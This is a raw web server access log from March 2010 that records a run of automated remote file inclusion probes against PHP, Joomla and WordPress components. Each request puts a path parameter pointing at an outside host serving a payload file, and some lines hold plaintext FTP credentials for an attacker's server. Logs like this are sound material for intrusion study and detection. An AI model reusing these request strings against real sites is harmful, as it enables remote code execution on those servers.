218.55.227.132 - - [05/Mar/2010:05:07:59 -0800] "GET /logs/access_100212.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:07:59 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:07:59 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:17 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:17 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:18 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:08:25 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:08:25 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:08:27 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:08:28 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:08:29 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:46 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:47 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:08:47 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:09:02 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:09:02 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:09:02 -0800] "GET /logs/access_100212.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:09:03 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:09:03 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:09:04 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:09:15 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:09:15 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:09:15 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:09:22 -0800] "GET /logs/access_100211.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [05/Mar/2010:05:09:24 -0800] "GET /logs/access.log//errors.php?error=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:09:29 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:09:31 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:09:31 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:09:32 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:09:46 -0800] "GET /logs/access_100225.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:15 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:15 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:15 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:24 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:24 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:25 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:27 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:27 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:10:27 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:34 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:34 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:10:34 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.132 - - [05/Mar/2010:05:10:38 -0800] "GET /logs/access_100225.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:05:10:57 -0800] "GET /logs/access_100128.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:05:10:57 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:05:10:57 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:05:11:01 -0800] "GET /logs/access_100129.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:11:21 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:22 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:22 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:22 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:23 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:23 -0800] "GET /logs/access_100210.log%20%20//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:23 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:33 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:05:11:34 -0800] "GET /logs/access_100204.log%20%20//components/com_flyspray/startdown.php?file=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:11:36 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:11:54 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:11:54 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:11:54 -0800] "GET /logs/access_100210.log//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:11:59 -0800] "GET /logs/access_100214.log%20%20///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:12:36 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:12:36 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [05/Mar/2010:05:12:39 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:13:01 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:13:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:13:32 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:13:32 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:13:32 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [05/Mar/2010:05:13:49 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:13:54 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [05/Mar/2010:05:14:07 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:05:14:25 -0800] "GET /logs//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:05:14:25 -0800] "GET /rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:05:14:25 -0800] "GET /logs/access_100217.log//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:05:14:39 -0800] "GET /logs/access_100222.log//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:15:29 -0800] "GET /logs/access_100221.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:16:03 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:16:13 -0800] "GET /logs/access_100216.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [05/Mar/2010:05:16:17 -0800] "GET /logs/access_100204.log//components/com_flyspray/startdown.php?file=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [05/Mar/2010:05:16:27 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:05:16:50 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [05/Mar/2010:05:16:51 -0800] "GET /logs/access_100217.log/////?_SERVER[DOCUMENT_ROOT]=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:16:55 -0800] "GET /logs/access_100211.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:05:17:00 -0800] "GET /logs/access_100128.log%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
218.55.227.145 - - [05/Mar/2010:05:17:03 -0800] "GET /logs/access_100217.log//rsgallery.html.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [05/Mar/2010:05:17:15 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:18 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:18 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:18 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:19 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:21 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:21 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:21 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:21 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:49 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:49 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:49 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:49 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:50 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:51 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:51 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:51 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:54 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:54 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:54 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:55 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:58 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:58 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [05/Mar/2010:05:17:58 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
